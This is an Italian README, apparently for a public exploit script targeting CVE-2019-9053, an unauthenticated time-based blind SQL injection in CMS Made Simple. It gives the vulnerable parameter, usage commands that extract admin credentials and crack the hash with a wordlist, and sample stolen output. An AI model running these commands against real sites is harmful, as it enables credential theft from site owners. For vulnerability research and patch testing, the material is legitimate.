
Exploit automatico per CVE-2019-9053, un'iniezione SQL cieca basata sul tempo in CMS Made Simple ≤2.2.9. Estrae le credenziali admin (username, email, hash della password + salt) e opzionalmente decifra la password offline.
CVE-2019-9053 è una vulnerabilità di iniezione SQL time-based blind che colpisce CMS Made Simple nelle versioni ≤ 2.2.9. Non richiede autenticazione.
Il parametro vulnerabile è m1_idlist nel modulo News (moduleinterface.php). Un attaccante può sfruttarlo per estrarre l'hash della password dell'amministratore, il suo nome utente, l'email e il salt utilizzato per l'hash.
Lo schema di memorizzazione delle password è MD5(salt + password), dove il salt è di 8 byte. Questo permette, una volta ottenuti hash e salt, di tentare il cracking offline della password con strumenti come hashcat o John the Ripper.
CVSS 3.1: 7.5 (HIGH) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Daniele Scanu — @Certimeter Group
L'exploit originale si trova su Exploit-DB #46635.
requests, termcolorpip2 install requests termcolor
# Estrarre credenziali (salt, utente, email, password hash)
python 46635.py -u http://target/cmsms
# Estrarre credenziali e tentare il cracking della password con un wordlist
python 46635.py -u http://target/cmsms --crack -w /path/to/rockyou.txt
L'exploit invia richieste HTTP con payload SQL che contengono SLEEP() per determinare carattere per carattere:
cms_siteprefs dove sitepref_name = 'sitemask'cms_users dove user_id = 1cms_usersMD5(salt + password)[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: [email protected]
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
moduleinterface.php| Campo | Valore |
|---|
| CVE | CVE-2019-9053 |
| Prodotto | CMS Made Simple |
| Versioni affette | ≤ 2.2.9 |
| Tipo | Time-based Blind SQL Injection (CWE-89) |
| Autenticazione | Non richiesta |
| Vettore | moduleinterface.php?mact=News,m1_,default,0&m1_idlist= |
| Impatto | Estrazione di credenziali (utente, email, password hash + salt) |
| CVSS 3.1 | 7.5 HIGH |
| Patch | CMS Made Simple 2.2.10 |
| Parametro | Descrizione |
|---|
-u / --url | URL base del CMS (es. http://10.10.10.100/cms) |
-w / --wordlist | Wordlist per crackare la password (opzionale) |
-c / --crack | Attivare la modalità di cracking della password |